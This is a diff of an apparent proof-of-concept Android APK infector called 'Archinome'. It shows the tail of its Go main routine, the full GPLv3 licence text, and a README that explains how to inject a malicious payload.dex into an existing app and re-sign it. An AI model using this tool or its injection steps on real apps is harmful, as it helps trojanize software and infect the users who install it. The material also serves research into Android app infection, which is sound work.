manifestPlainFile, err := os.Create(manifest.PlainPath) // create/truncate the file
|
||||
if err != nil {
|
||||
log.Panic("Failed to create AndroidManifest plaintext", err)
|
||||
}
|
||||
|
||||
enc := xml.NewEncoder(manifestPlainFile)
|
||||
|
||||
enc.Indent("", "\t")
|
||||
|
||||
fmt.Println("Parsing APK...")
|
||||
manifest.ParseApk(os.Args[1], enc)
|
||||
|
||||
//close before reading
|
||||
manifestPlainFile.Close()
|
||||
|
||||
fmt.Println("Patching APK")
|
||||
fmt.Println("\t--Patching manifest...")
|
||||
manifest.Patch()
|
||||
|
||||
fmt.Println("\t--Patching dex...")
|
||||
mydex.Patch()
|
||||
|
||||
fmt.Println("Injecting...")
|
||||
common.Inject(os.Args[1], os.Args[2])
|
||||
|
||||
fmt.Println("Done! Now you should sign your apk")
|
||||
}
|
Binary file not shown.
|
@ -0,0 +1,674 @@
|
|||
GNU GENERAL PUBLIC LICENSE
|
||||
Version 3, 29 June 2007
|
||||
|
||||
Copyright (C) 2007 Free Software Foundation, Inc. <https://fsf.org/>
|
||||
Everyone is permitted to copy and distribute verbatim copies
|
||||
of this license document, but changing it is not allowed.
|
||||
|
||||
Preamble
|
||||
|
||||
The GNU General Public License is a free, copyleft license for
|
||||
software and other kinds of works.
|
||||
|
||||
The licenses for most software and other practical works are designed
|
||||
to take away your freedom to share and change the works. By contrast,
|
||||
the GNU General Public License is intended to guarantee your freedom to
|
||||
share and change all versions of a program--to make sure it remains free
|
||||
software for all its users. We, the Free Software Foundation, use the
|
||||
GNU General Public License for most of our software; it applies also to
|
||||
any other work released this way by its authors. You can apply it to
|
||||
your programs, too.
|
||||
|
||||
When we speak of free software, we are referring to freedom, not
|
||||
price. Our General Public Licenses are designed to make sure that you
|
||||
have the freedom to distribute copies of free software (and charge for
|
||||
them if you wish), that you receive source code or can get it if you
|
||||
want it, that you can change the software or use pieces of it in new
|
||||
free programs, and that you know you can do these things.
|
||||
|
||||
To protect your rights, we need to prevent others from denying you
|
||||
these rights or asking you to surrender the rights. Therefore, you have
|
||||
certain responsibilities if you distribute copies of the software, or if
|
||||
you modify it: responsibilities to respect the freedom of others.
|
||||
|
||||
For example, if you distribute copies of such a program, whether
|
||||
gratis or for a fee, you must pass on to the recipients the same
|
||||
freedoms that you received. You must make sure that they, too, receive
|
||||
or can get the source code. And you must show them these terms so they
|
||||
know their rights.
|
||||
|
||||
Developers that use the GNU GPL protect your rights with two steps:
|
||||
(1) assert copyright on the software, and (2) offer you this License
|
||||
giving you legal permission to copy, distribute and/or modify it.
|
||||
|
||||
For the developers' and authors' protection, the GPL clearly explains
|
||||
that there is no warranty for this free software. For both users' and
|
||||
authors' sake, the GPL requires that modified versions be marked as
|
||||
changed, so that their problems will not be attributed erroneously to
|
||||
authors of previous versions.
|
||||
|
||||
Some devices are designed to deny users access to install or run
|
||||
modified versions of the software inside them, although the manufacturer
|
||||
can do so. This is fundamentally incompatible with the aim of
|
||||
protecting users' freedom to change the software. The systematic
|
||||
pattern of such abuse occurs in the area of products for individuals to
|
||||
use, which is precisely where it is most unacceptable. Therefore, we
|
||||
have designed this version of the GPL to prohibit the practice for those
|
||||
products. If such problems arise substantially in other domains, we
|
||||
stand ready to extend this provision to those domains in future versions
|
||||
of the GPL, as needed to protect the freedom of users.
|
||||
|
||||
Finally, every program is threatened constantly by software patents.
|
||||
States should not allow patents to restrict development and use of
|
||||
software on general-purpose computers, but in those that do, we wish to
|
||||
avoid the special danger that patents applied to a free program could
|
||||
make it effectively proprietary. To prevent this, the GPL assures that
|
||||
patents cannot be used to render the program non-free.
|
||||
|
||||
The precise terms and conditions for copying, distribution and
|
||||
modification follow.
|
||||
|
||||
TERMS AND CONDITIONS
|
||||
|
||||
0. Definitions.
|
||||
|
||||
"This License" refers to version 3 of the GNU General Public License.
|
||||
|
||||
"Copyright" also means copyright-like laws that apply to other kinds of
|
||||
works, such as semiconductor masks.
|
||||
|
||||
"The Program" refers to any copyrightable work licensed under this
|
||||
License. Each licensee is addressed as "you". "Licensees" and
|
||||
"recipients" may be individuals or organizations.
|
||||
|
||||
To "modify" a work means to copy from or adapt all or part of the work
|
||||
in a fashion requiring copyright permission, other than the making of an
|
||||
exact copy. The resulting work is called a "modified version" of the
|
||||
earlier work or a work "based on" the earlier work.
|
||||
|
||||
A "covered work" means either the unmodified Program or a work based
|
||||
on the Program.
|
||||
|
||||
To "propagate" a work means to do anything with it that, without
|
||||
permission, would make you directly or secondarily liable for
|
||||
infringement under applicable copyright law, except executing it on a
|
||||
computer or modifying a private copy. Propagation includes copying,
|
||||
distribution (with or without modification), making available to the
|
||||
public, and in some countries other activities as well.
|
||||
|
||||
To "convey" a work means any kind of propagation that enables other
|
||||
parties to make or receive copies. Mere interaction with a user through
|
||||
a computer network, with no transfer of a copy, is not conveying.
|
||||
|
||||
An interactive user interface displays "Appropriate Legal Notices"
|
||||
to the extent that it includes a convenient and prominently visible
|
||||
feature that (1) displays an appropriate copyright notice, and (2)
|
||||
tells the user that there is no warranty for the work (except to the
|
||||
extent that warranties are provided), that licensees may convey the
|
||||
work under this License, and how to view a copy of this License. If
|
||||
the interface presents a list of user commands or options, such as a
|
||||
menu, a prominent item in the list meets this criterion.
|
||||
|
||||
1. Source Code.
|
||||
|
||||
The "source code" for a work means the preferred form of the work
|
||||
for making modifications to it. "Object code" means any non-source
|
||||
form of a work.
|
||||
|
||||
A "Standard Interface" means an interface that either is an official
|
||||
standard defined by a recognized standards body, or, in the case of
|
||||
interfaces specified for a particular programming language, one that
|
||||
is widely used among developers working in that language.
|
||||
|
||||
The "System Libraries" of an executable work include anything, other
|
||||
than the work as a whole, that (a) is included in the normal form of
|
||||
packaging a Major Component, but which is not part of that Major
|
||||
Component, and (b) serves only to enable use of the work with that
|
||||
Major Component, or to implement a Standard Interface for which an
|
||||
implementation is available to the public in source code form. A
|
||||
"Major Component", in this context, means a major essential component
|
||||
(kernel, window system, and so on) of the specific operating system
|
||||
(if any) on which the executable work runs, or a compiler used to
|
||||
produce the work, or an object code interpreter used to run it.
|
||||
|
||||
The "Corresponding Source" for a work in object code form means all
|
||||
the source code needed to generate, install, and (for an executable
|
||||
work) run the object code and to modify the work, including scripts to
|
||||
control those activities. However, it does not include the work's
|
||||
System Libraries, or general-purpose tools or generally available free
|
||||
programs which are used unmodified in performing those activities but
|
||||
which are not part of the work. For example, Corresponding Source
|
||||
includes interface definition files associated with source files for
|
||||
the work, and the source code for shared libraries and dynamically
|
||||
linked subprograms that the work is specifically designed to require,
|
||||
such as by intimate data communication or control flow between those
|
||||
subprograms and other parts of the work.
|
||||
|
||||
The Corresponding Source need not include anything that users
|
||||
can regenerate automatically from other parts of the Corresponding
|
||||
Source.
|
||||
|
||||
The Corresponding Source for a work in source code form is that
|
||||
same work.
|
||||
|
||||
2. Basic Permissions.
|
||||
|
||||
All rights granted under this License are granted for the term of
|
||||
copyright on the Program, and are irrevocable provided the stated
|
||||
conditions are met. This License explicitly affirms your unlimited
|
||||
permission to run the unmodified Program. The output from running a
|
||||
covered work is covered by this License only if the output, given its
|
||||
content, constitutes a covered work. This License acknowledges your
|
||||
rights of fair use or other equivalent, as provided by copyright law.
|
||||
|
||||
You may make, run and propagate covered works that you do not
|
||||
convey, without conditions so long as your license otherwise remains
|
||||
in force. You may convey covered works to others for the sole purpose
|
||||
of having them make modifications exclusively for you, or provide you
|
||||
with facilities for running those works, provided that you comply with
|
||||
the terms of this License in conveying all material for which you do
|
||||
not control copyright. Those thus making or running the covered works
|
||||
for you must do so exclusively on your behalf, under your direction
|
||||
and control, on terms that prohibit them from making any copies of
|
||||
your copyrighted material outside their relationship with you.
|
||||
|
||||
Conveying under any other circumstances is permitted solely under
|
||||
the conditions stated below. Sublicensing is not allowed; section 10
|
||||
makes it unnecessary.
|
||||
|
||||
3. Protecting Users' Legal Rights From Anti-Circumvention Law.
|
||||
|
||||
No covered work shall be deemed part of an effective technological
|
||||
measure under any applicable law fulfilling obligations under article
|
||||
11 of the WIPO copyright treaty adopted on 20 December 1996, or
|
||||
similar laws prohibiting or restricting circumvention of such
|
||||
measures.
|
||||
|
||||
When you convey a covered work, you waive any legal power to forbid
|
||||
circumvention of technological measures to the extent such circumvention
|
||||
is effected by exercising rights under this License with respect to
|
||||
the covered work, and you disclaim any intention to limit operation or
|
||||
modification of the work as a means of enforcing, against the work's
|
||||
users, your or third parties' legal rights to forbid circumvention of
|
||||
technological measures.
|
||||
|
||||
4. Conveying Verbatim Copies.
|
||||
|
||||
You may convey verbatim copies of the Program's source code as you
|
||||
receive it, in any medium, provided that you conspicuously and
|
||||
appropriately publish on each copy an appropriate copyright notice;
|
||||
keep intact all notices stating that this License and any
|
||||
non-permissive terms added in accord with section 7 apply to the code;
|
||||
keep intact all notices of the absence of any warranty; and give all
|
||||
recipients a copy of this License along with the Program.
|
||||
|
||||
You may charge any price or no price for each copy that you convey,
|
||||
and you may offer support or warranty protection for a fee.
|
||||
|
||||
5. Conveying Modified Source Versions.
|
||||
|
||||
You may convey a work based on the Program, or the modifications to
|
||||
produce it from the Program, in the form of source code under the
|
||||
terms of section 4, provided that you also meet all of these conditions:
|
||||
|
||||
a) The work must carry prominent notices stating that you modified
|
||||
it, and giving a relevant date.
|
||||
|
||||
b) The work must carry prominent notices stating that it is
|
||||
released under this License and any conditions added under section
|
||||
7. This requirement modifies the requirement in section 4 to
|
||||
"keep intact all notices".
|
||||
|
||||
c) You must license the entire work, as a whole, under this
|
||||
License to anyone who comes into possession of a copy. This
|
||||
License will therefore apply, along with any applicable section 7
|
||||
additional terms, to the whole of the work, and all its parts,
|
||||
regardless of how they are packaged. This License gives no
|
||||
permission to license the work in any other way, but it does not
|
||||
invalidate such permission if you have separately received it.
|
||||
|
||||
d) If the work has interactive user interfaces, each must display
|
||||
Appropriate Legal Notices; however, if the Program has interactive
|
||||
interfaces that do not display Appropriate Legal Notices, your
|
||||
work need not make them do so.
|
||||
|
||||
A compilation of a covered work with other separate and independent
|
||||
works, which are not by their nature extensions of the covered work,
|
||||
and which are not combined with it such as to form a larger program,
|
||||
in or on a volume of a storage or distribution medium, is called an
|
||||
"aggregate" if the compilation and its resulting copyright are not
|
||||
used to limit the access or legal rights of the compilation's users
|
||||
beyond what the individual works permit. Inclusion of a covered work
|
||||
in an aggregate does not cause this License to apply to the other
|
||||
parts of the aggregate.
|
||||
|
||||
6. Conveying Non-Source Forms.
|
||||
|
||||
You may convey a covered work in object code form under the terms
|
||||
of sections 4 and 5, provided that you also convey the
|
||||
machine-readable Corresponding Source under the terms of this License,
|
||||
in one of these ways:
|
||||
|
||||
a) Convey the object code in, or embodied in, a physical product
|
||||
(including a physical distribution medium), accompanied by the
|
||||
Corresponding Source fixed on a durable physical medium
|
||||
customarily used for software interchange.
|
||||
|
||||
b) Convey the object code in, or embodied in, a physical product
|
||||
(including a physical distribution medium), accompanied by a
|
||||
written offer, valid for at least three years and valid for as
|
||||
long as you offer spare parts or customer support for that product
|
||||
model, to give anyone who possesses the object code either (1) a
|
||||
copy of the Corresponding Source for all the software in the
|
||||
product that is covered by this License, on a durable physical
|
||||
medium customarily used for software interchange, for a price no
|
||||
more than your reasonable cost of physically performing this
|
||||
conveying of source, or (2) access to copy the
|
||||
Corresponding Source from a network server at no charge.
|
||||
|
||||
c) Convey individual copies of the object code with a copy of the
|
||||
written offer to provide the Corresponding Source. This
|
||||
alternative is allowed only occasionally and noncommercially, and
|
||||
only if you received the object code with such an offer, in accord
|
||||
with subsection 6b.
|
||||
|
||||
d) Convey the object code by offering access from a designated
|
||||
place (gratis or for a charge), and offer equivalent access to the
|
||||
Corresponding Source in the same way through the same place at no
|
||||
further charge. You need not require recipients to copy the
|
||||
Corresponding Source along with the object code. If the place to
|
||||
copy the object code is a network server, the Corresponding Source
|
||||
may be on a different server (operated by you or a third party)
|
||||
that supports equivalent copying facilities, provided you maintain
|
||||
clear directions next to the object code saying where to find the
|
||||
Corresponding Source. Regardless of what server hosts the
|
||||
Corresponding Source, you remain obligated to ensure that it is
|
||||
available for as long as needed to satisfy these requirements.
|
||||
|
||||
e) Convey the object code using peer-to-peer transmission, provided
|
||||
you inform other peers where the object code and Corresponding
|
||||
Source of the work are being offered to the general public at no
|
||||
charge under subsection 6d.
|
||||
|
||||
A separable portion of the object code, whose source code is excluded
|
||||
from the Corresponding Source as a System Library, need not be
|
||||
included in conveying the object code work.
|
||||
|
||||
A "User Product" is either (1) a "consumer product", which means any
|
||||
tangible personal property which is normally used for personal, family,
|
||||
or household purposes, or (2) anything designed or sold for incorporation
|
||||
into a dwelling. In determining whether a product is a consumer product,
|
||||
doubtful cases shall be resolved in favor of coverage. For a particular
|
||||
product received by a particular user, "normally used" refers to a
|
||||
typical or common use of that class of product, regardless of the status
|
||||
of the particular user or of the way in which the particular user
|
||||
actually uses, or expects or is expected to use, the product. A product
|
||||
is a consumer product regardless of whether the product has substantial
|
||||
commercial, industrial or non-consumer uses, unless such uses represent
|
||||
the only significant mode of use of the product.
|
||||
|
||||
"Installation Information" for a User Product means any methods,
|
||||
procedures, authorization keys, or other information required to install
|
||||
and execute modified versions of a covered work in that User Product from
|
||||
a modified version of its Corresponding Source. The information must
|
||||
suffice to ensure that the continued functioning of the modified object
|
||||
code is in no case prevented or interfered with solely because
|
||||
modification has been made.
|
||||
|
||||
If you convey an object code work under this section in, or with, or
|
||||
specifically for use in, a User Product, and the conveying occurs as
|
||||
part of a transaction in which the right of possession and use of the
|
||||
User Product is transferred to the recipient in perpetuity or for a
|
||||
fixed term (regardless of how the transaction is characterized), the
|
||||
Corresponding Source conveyed under this section must be accompanied
|
||||
by the Installation Information. But this requirement does not apply
|
||||
if neither you nor any third party retains the ability to install
|
||||
modified object code on the User Product (for example, the work has
|
||||
been installed in ROM).
|
||||
|
||||
The requirement to provide Installation Information does not include a
|
||||
requirement to continue to provide support service, warranty, or updates
|
||||
for a work that has been modified or installed by the recipient, or for
|
||||
the User Product in which it has been modified or installed. Access to a
|
||||
network may be denied when the modification itself materially and
|
||||
adversely affects the operation of the network or violates the rules and
|
||||
protocols for communication across the network.
|
||||
|
||||
Corresponding Source conveyed, and Installation Information provided,
|
||||
in accord with this section must be in a format that is publicly
|
||||
documented (and with an implementation available to the public in
|
||||
source code form), and must require no special password or key for
|
||||
unpacking, reading or copying.
|
||||
|
||||
7. Additional Terms.
|
||||
|
||||
"Additional permissions" are terms that supplement the terms of this
|
||||
License by making exceptions from one or more of its conditions.
|
||||
Additional permissions that are applicable to the entire Program shall
|
||||
be treated as though they were included in this License, to the extent
|
||||
that they are valid under applicable law. If additional permissions
|
||||
apply only to part of the Program, that part may be used separately
|
||||
under those permissions, but the entire Program remains governed by
|
||||
this License without regard to the additional permissions.
|
||||
|
||||
When you convey a copy of a covered work, you may at your option
|
||||
remove any additional permissions from that copy, or from any part of
|
||||
it. (Additional permissions may be written to require their own
|
||||
removal in certain cases when you modify the work.) You may place
|
||||
additional permissions on material, added by you to a covered work,
|
||||
for which you have or can give appropriate copyright permission.
|
||||
|
||||
Notwithstanding any other provision of this License, for material you
|
||||
add to a covered work, you may (if authorized by the copyright holders of
|
||||
that material) supplement the terms of this License with terms:
|
||||
|
||||
a) Disclaiming warranty or limiting liability differently from the
|
||||
terms of sections 15 and 16 of this License; or
|
||||
|
||||
b) Requiring preservation of specified reasonable legal notices or
|
||||
author attributions in that material or in the Appropriate Legal
|
||||
Notices displayed by works containing it; or
|
||||
|
||||
c) Prohibiting misrepresentation of the origin of that material, or
|
||||
requiring that modified versions of such material be marked in
|
||||
reasonable ways as different from the original version; or
|
||||
|
||||
d) Limiting the use for publicity purposes of names of licensors or
|
||||
authors of the material; or
|
||||
|
||||
e) Declining to grant rights under trademark law for use of some
|
||||
trade names, trademarks, or service marks; or
|
||||
|
||||
f) Requiring indemnification of licensors and authors of that
|
||||
material by anyone who conveys the material (or modified versions of
|
||||
it) with contractual assumptions of liability to the recipient, for
|
||||
any liability that these contractual assumptions directly impose on
|
||||
those licensors and authors.
|
||||
|
||||
All other non-permissive additional terms are considered "further
|
||||
restrictions" within the meaning of section 10. If the Program as you
|
||||
received it, or any part of it, contains a notice stating that it is
|
||||
governed by this License along with a term that is a further
|
||||
restriction, you may remove that term. If a license document contains
|
||||
a further restriction but permits relicensing or conveying under this
|
||||
License, you may add to a covered work material governed by the terms
|
||||
of that license document, provided that the further restriction does
|
||||
not survive such relicensing or conveying.
|
||||
|
||||
If you add terms to a covered work in accord with this section, you
|
||||
must place, in the relevant source files, a statement of the
|
||||
additional terms that apply to those files, or a notice indicating
|
||||
where to find the applicable terms.
|
||||
|
||||
Additional terms, permissive or non-permissive, may be stated in the
|
||||
form of a separately written license, or stated as exceptions;
|
||||
the above requirements apply either way.
|
||||
|
||||
8. Termination.
|
||||
|
||||
You may not propagate or modify a covered work except as expressly
|
||||
provided under this License. Any attempt otherwise to propagate or
|
||||
modify it is void, and will automatically terminate your rights under
|
||||
this License (including any patent licenses granted under the third
|
||||
paragraph of section 11).
|
||||
|
||||
However, if you cease all violation of this License, then your
|
||||
license from a particular copyright holder is reinstated (a)
|
||||
provisionally, unless and until the copyright holder explicitly and
|
||||
finally terminates your license, and (b) permanently, if the copyright
|
||||
holder fails to notify you of the violation by some reasonable means
|
||||
prior to 60 days after the cessation.
|
||||
|
||||
Moreover, your license from a particular copyright holder is
|
||||
reinstated permanently if the copyright holder notifies you of the
|
||||
violation by some reasonable means, this is the first time you have
|
||||
received notice of violation of this License (for any work) from that
|
||||
copyright holder, and you cure the violation prior to 30 days after
|
||||
your receipt of the notice.
|
||||
|
||||
Termination of your rights under this section does not terminate the
|
||||
licenses of parties who have received copies or rights from you under
|
||||
this License. If your rights have been terminated and not permanently
|
||||
reinstated, you do not qualify to receive new licenses for the same
|
||||
material under section 10.
|
||||
|
||||
9. Acceptance Not Required for Having Copies.
|
||||
|
||||
You are not required to accept this License in order to receive or
|
||||
run a copy of the Program. Ancillary propagation of a covered work
|
||||
occurring solely as a consequence of using peer-to-peer transmission
|
||||
to receive a copy likewise does not require acceptance. However,
|
||||
nothing other than this License grants you permission to propagate or
|
||||
modify any covered work. These actions infringe copyright if you do
|
||||
not accept this License. Therefore, by modifying or propagating a
|
||||
covered work, you indicate your acceptance of this License to do so.
|
||||
|
||||
10. Automatic Licensing of Downstream Recipients.
|
||||
|
||||
Each time you convey a covered work, the recipient automatically
|
||||
receives a license from the original licensors, to run, modify and
|
||||
propagate that work, subject to this License. You are not responsible
|
||||
for enforcing compliance by third parties with this License.
|
||||
|
||||
An "entity transaction" is a transaction transferring control of an
|
||||
organization, or substantially all assets of one, or subdividing an
|
||||
organization, or merging organizations. If propagation of a covered
|
||||
work results from an entity transaction, each party to that
|
||||
transaction who receives a copy of the work also receives whatever
|
||||
licenses to the work the party's predecessor in interest had or could
|
||||
give under the previous paragraph, plus a right to possession of the
|
||||
Corresponding Source of the work from the predecessor in interest, if
|
||||
the predecessor has it or can get it with reasonable efforts.
|
||||
|
||||
You may not impose any further restrictions on the exercise of the
|
||||
rights granted or affirmed under this License. For example, you may
|
||||
not impose a license fee, royalty, or other charge for exercise of
|
||||
rights granted under this License, and you may not initiate litigation
|
||||
(including a cross-claim or counterclaim in a lawsuit) alleging that
|
||||
any patent claim is infringed by making, using, selling, offering for
|
||||
sale, or importing the Program or any portion of it.
|
||||
|
||||
11. Patents.
|
||||
|
||||
A "contributor" is a copyright holder who authorizes use under this
|
||||
License of the Program or a work on which the Program is based. The
|
||||
work thus licensed is called the contributor's "contributor version".
|
||||
|
||||
A contributor's "essential patent claims" are all patent claims
|
||||
owned or controlled by the contributor, whether already acquired or
|
||||
hereafter acquired, that would be infringed by some manner, permitted
|
||||
by this License, of making, using, or selling its contributor version,
|
||||
but do not include claims that would be infringed only as a
|
||||
consequence of further modification of the contributor version. For
|
||||
purposes of this definition, "control" includes the right to grant
|
||||
patent sublicenses in a manner consistent with the requirements of
|
||||
this License.
|
||||
|
||||
Each contributor grants you a non-exclusive, worldwide, royalty-free
|
||||
patent license under the contributor's essential patent claims, to
|
||||
make, use, sell, offer for sale, import and otherwise run, modify and
|
||||
propagate the contents of its contributor version.
|
||||
|
||||
In the following three paragraphs, a "patent license" is any express
|
||||
agreement or commitment, however denominated, not to enforce a patent
|
||||
(such as an express permission to practice a patent or covenant not to
|
||||
sue for patent infringement). To "grant" such a patent license to a
|
||||
party means to make such an agreement or commitment not to enforce a
|
||||
patent against the party.
|
||||
|
||||
If you convey a covered work, knowingly relying on a patent license,
|
||||
and the Corresponding Source of the work is not available for anyone
|
||||
to copy, free of charge and under the terms of this License, through a
|
||||
publicly available network server or other readily accessible means,
|
||||
then you must either (1) cause the Corresponding Source to be so
|
||||
available, or (2) arrange to deprive yourself of the benefit of the
|
||||
patent license for this particular work, or (3) arrange, in a manner
|
||||
consistent with the requirements of this License, to extend the patent
|
||||
license to downstream recipients. "Knowingly relying" means you have
|
||||
actual knowledge that, but for the patent license, your conveying the
|
||||
covered work in a country, or your recipient's use of the covered work
|
||||
in a country, would infringe one or more identifiable patents in that
|
||||
country that you have reason to believe are valid.
|
||||
|
||||
If, pursuant to or in connection with a single transaction or
|
||||
arrangement, you convey, or propagate by procuring conveyance of, a
|
||||
covered work, and grant a patent license to some of the parties
|
||||
receiving the covered work authorizing them to use, propagate, modify
|
||||
or convey a specific copy of the covered work, then the patent license
|
||||
you grant is automatically extended to all recipients of the covered
|
||||
work and works based on it.
|
||||
|
||||
A patent license is "discriminatory" if it does not include within
|
||||
the scope of its coverage, prohibits the exercise of, or is
|
||||
conditioned on the non-exercise of one or more of the rights that are
|
||||
specifically granted under this License. You may not convey a covered
|
||||
work if you are a party to an arrangement with a third party that is
|
||||
in the business of distributing software, under which you make payment
|
||||
to the third party based on the extent of your activity of conveying
|
||||
the work, and under which the third party grants, to any of the
|
||||
parties who would receive the covered work from you, a discriminatory
|
||||
patent license (a) in connection with copies of the covered work
|
||||
conveyed by you (or copies made from those copies), or (b) primarily
|
||||
for and in connection with specific products or compilations that
|
||||
contain the covered work, unless you entered into that arrangement,
|
||||
or that patent license was granted, prior to 28 March 2007.
|
||||
|
||||
Nothing in this License shall be construed as excluding or limiting
|
||||
any implied license or other defenses to infringement that may
|
||||
otherwise be available to you under applicable patent law.
|
||||
|
||||
12. No Surrender of Others' Freedom.
|
||||
|
||||
If conditions are imposed on you (whether by court order, agreement or
|
||||
otherwise) that contradict the conditions of this License, they do not
|
||||
excuse you from the conditions of this License. If you cannot convey a
|
||||
covered work so as to satisfy simultaneously your obligations under this
|
||||
License and any other pertinent obligations, then as a consequence you may
|
||||
not convey it at all. For example, if you agree to terms that obligate you
|
||||
to collect a royalty for further conveying from those to whom you convey
|
||||
the Program, the only way you could satisfy both those terms and this
|
||||
License would be to refrain entirely from conveying the Program.
|
||||
|
||||
13. Use with the GNU Affero General Public License.
|
||||
|
||||
Notwithstanding any other provision of this License, you have
|
||||
permission to link or combine any covered work with a work licensed
|
||||
under version 3 of the GNU Affero General Public License into a single
|
||||
combined work, and to convey the resulting work. The terms of this
|
||||
License will continue to apply to the part which is the covered work,
|
||||
but the special requirements of the GNU Affero General Public License,
|
||||
section 13, concerning interaction through a network will apply to the
|
||||
combination as such.
|
||||
|
||||
14. Revised Versions of this License.
|
||||
|
||||
The Free Software Foundation may publish revised and/or new versions of
|
||||
the GNU General Public License from time to time. Such new versions will
|
||||
be similar in spirit to the present version, but may differ in detail to
|
||||
address new problems or concerns.
|
||||
|
||||
Each version is given a distinguishing version number. If the
|
||||
Program specifies that a certain numbered version of the GNU General
|
||||
Public License "or any later version" applies to it, you have the
|
||||
option of following the terms and conditions either of that numbered
|
||||
version or of any later version published by the Free Software
|
||||
Foundation. If the Program does not specify a version number of the
|
||||
GNU General Public License, you may choose any version ever published
|
||||
by the Free Software Foundation.
|
||||
|
||||
If the Program specifies that a proxy can decide which future
|
||||
versions of the GNU General Public License can be used, that proxy's
|
||||
public statement of acceptance of a version permanently authorizes you
|
||||
to choose that version for the Program.
|
||||
|
||||
Later license versions may give you additional or different
|
||||
permissions. However, no additional obligations are imposed on any
|
||||
author or copyright holder as a result of your choosing to follow a
|
||||
later version.
|
||||
|
||||
15. Disclaimer of Warranty.
|
||||
|
||||
THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY
|
||||
APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT
|
||||
HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY
|
||||
OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,
|
||||
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
|
||||
PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM
|
||||
IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF
|
||||
ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
|
||||
|
||||
16. Limitation of Liability.
|
||||
|
||||
IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
|
||||
WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS
|
||||
THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
|
||||
GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE
|
||||
USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF
|
||||
DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD
|
||||
PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),
|
||||
EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF
|
||||
SUCH DAMAGES.
|
||||
|
||||
17. Interpretation of Sections 15 and 16.
|
||||
|
||||
If the disclaimer of warranty and limitation of liability provided
|
||||
above cannot be given local legal effect according to their terms,
|
||||
reviewing courts shall apply local law that most closely approximates
|
||||
an absolute waiver of all civil liability in connection with the
|
||||
Program, unless a warranty or assumption of liability accompanies a
|
||||
copy of the Program in return for a fee.
|
||||
|
||||
END OF TERMS AND CONDITIONS
|
||||
|
||||
How to Apply These Terms to Your New Programs
|
||||
|
||||
If you develop a new program, and you want it to be of the greatest
|
||||
possible use to the public, the best way to achieve this is to make it
|
||||
free software which everyone can redistribute and change under these terms.
|
||||
|
||||
To do so, attach the following notices to the program. It is safest
|
||||
to attach them to the start of each source file to most effectively
|
||||
state the exclusion of warranty; and each file should have at least
|
||||
the "copyright" line and a pointer to where the full notice is found.
|
||||
|
||||
<one line to give the program's name and a brief idea of what it does.>
|
||||
Copyright (C) <year> <name of author>
|
||||
|
||||
This program is free software: you can redistribute it and/or modify
|
||||
it under the terms of the GNU General Public License as published by
|
||||
the Free Software Foundation, either version 3 of the License, or
|
||||
(at your option) any later version.
|
||||
|
||||
This program is distributed in the hope that it will be useful,
|
||||
but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||
GNU General Public License for more details.
|
||||
|
||||
You should have received a copy of the GNU General Public License
|
||||
along with this program. If not, see <https://www.gnu.org/licenses/>.
|
||||
|
||||
Also add information on how to contact you by electronic and paper mail.
|
||||
|
||||
If the program does terminal interaction, make it output a short
|
||||
notice like this when it starts in an interactive mode:
|
||||
|
||||
<program> Copyright (C) <year> <name of author>
|
||||
This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
|
||||
This is free software, and you are welcome to redistribute it
|
||||
under certain conditions; type `show c' for details.
|
||||
|
||||
The hypothetical commands `show w' and `show c' should show the appropriate
|
||||
parts of the General Public License. Of course, your program's commands
|
||||
might be different; for a GUI interface, you would use an "about box".
|
||||
|
||||
You should also get your employer (if you work as a programmer) or school,
|
||||
if any, to sign a "copyright disclaimer" for the program, if necessary.
|
||||
For more information on this, and how to apply and follow the GNU GPL, see
|
||||
<https://www.gnu.org/licenses/>.
|
||||
|
||||
The GNU General Public License does not permit incorporating your program
|
||||
into proprietary programs. If your program is a subroutine library, you
|
||||
may consider it more useful to permit linking proprietary applications with
|
||||
the library. If this is what you want to do, use the GNU Lesser General
|
||||
Public License instead of this License. But first, please read
|
||||
<https://www.gnu.org/licenses/why-not-lgpl.html>.
|
|
@ -0,0 +1,39 @@
|
|||
# Apk infector Archinome PoC
|
||||
|
||||
Program that infects APK with malicious code using DEX/Manifest patching
|
||||
|
||||
**Full description about What is it and How it works:**
|
||||
|
||||
https://www.orderofsixangles.com/en/2020/04/07/android-infection-the-new-way.html (EN)
|
||||
|
||||
https://www.orderofsixangles.com/ru/2020/07/04/Infecting-android-app-the-new-way.html (RU)
|
||||
|
||||
**Please read article berfore use it!**
|
||||
|
||||
Receives two args:
|
||||
```
|
||||
./Archinome path_to_apk output_apk_filename
|
||||
```
|
||||
|
||||
To inject your malicious code, you should place file named payload.dex with malicious code that follow rules:
|
||||
|
||||
1. Class name within payload.dex - `aaaaaaaaaaaa.payload`
|
||||
|
||||
2. Method `public void executePayload()`
|
||||
|
||||
After you infect apk please sign it.
|
||||
|
||||
If there are problems make sure that:
|
||||
1. The original application works
|
||||
2. All file paths in PoC are correct
|
||||
3. There's nothing unusual in apkinfector.log.
|
||||
4. The name of the original Application class in the patched InjectedApp.dex is really in its place.
|
||||
5. The target application uses its Application class. Otherwise, PoC inoperability is predictable.
|
||||
|
||||
